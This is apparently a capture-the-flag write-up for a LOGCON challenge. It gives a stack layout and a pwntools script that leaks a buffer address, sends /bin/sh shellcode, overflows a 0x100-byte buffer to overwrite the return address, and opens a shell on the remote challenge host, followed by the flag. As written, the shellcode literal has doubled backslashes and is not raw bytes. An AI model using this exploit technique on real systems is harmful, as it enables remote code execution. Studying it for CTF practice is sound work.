
| rsp |
|---|
| BUF[rbp-0x100] |
| sfp |
| ret |
| rbp |
위 스택 구조에 맞게 Ret2Shellcode 공격을 수행하면 된다.
from pwn import *
#p = process('./prob')
# Connect to the challenge service named on the page; the commented line
# above is the local-binary variant of the same setup.
p = remote('prob.teamlog.kr',10001)
# The binary is parsed but `e` is not referenced by the rest of the visible
# script (only the commented-out libc line below would use it).
e = ELF('./prob')
context.arch = "amd64"
# Debug logging prints every send/recv, which is how the interaction below
# can be checked against the target's actual prompts.
context.log_level = "debug"
#libc = e.libc
def slog(name, addr):
    """Log ``name`` with ``addr`` rendered as hex via pwntools' ``success`` and return its result."""
    return success(f"{name}:{hex(addr)}")
# Interaction sequence with the target; the send/recv order must match the
# service's prompts exactly.
p.sendafter("Do you know C?", b"Yes!")
p.recvuntil("Here's my gift: 0x")
# The 12 hex digits following "0x" are parsed as the leaked address
# (an amd64 user-space address fits in 12 hex digits).
leak: int = int(p.recv(12),16)
slog("leak",leak)
# NOTE(review): the doubled backslashes look like a rendering artifact of the
# page. As written, this Python literal is ASCII text rather than raw bytes,
# so the padding arithmetic below counts characters, not machine code.
shellcode: bytes = b"\\x31\\xf6\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x56\\x53\\x54\\x5f\\x6a\\x3b\\x58\\x31\\xd2\\x0f\\x05"
# Stack layout per the table above: BUF (0x100 bytes) | sfp (8) | ret.
# No canary sits between BUF and sfp, which is why a plain linear overflow
# reaches the saved return address.
payload: bytes = shellcode
payload += b'A'*(0x100-len(shellcode))  # fill the rest of the 0x100-byte buffer
payload += b'B'*0x8                      # overwrite the saved rbp (sfp)
# Return address <- the leaked value. Presumably the leak is the buffer's own
# address, so the return lands on the shellcode placed at the start of BUF;
# that only works when the stack is executable (NX disabled) — confirm against
# the binary's protections.
payload += p64(leak)
p.sendafter("Do you know pwnable?",payload)
p.interactive()

FLAG : LOGCON{v3rY_ez_she1lc0d3}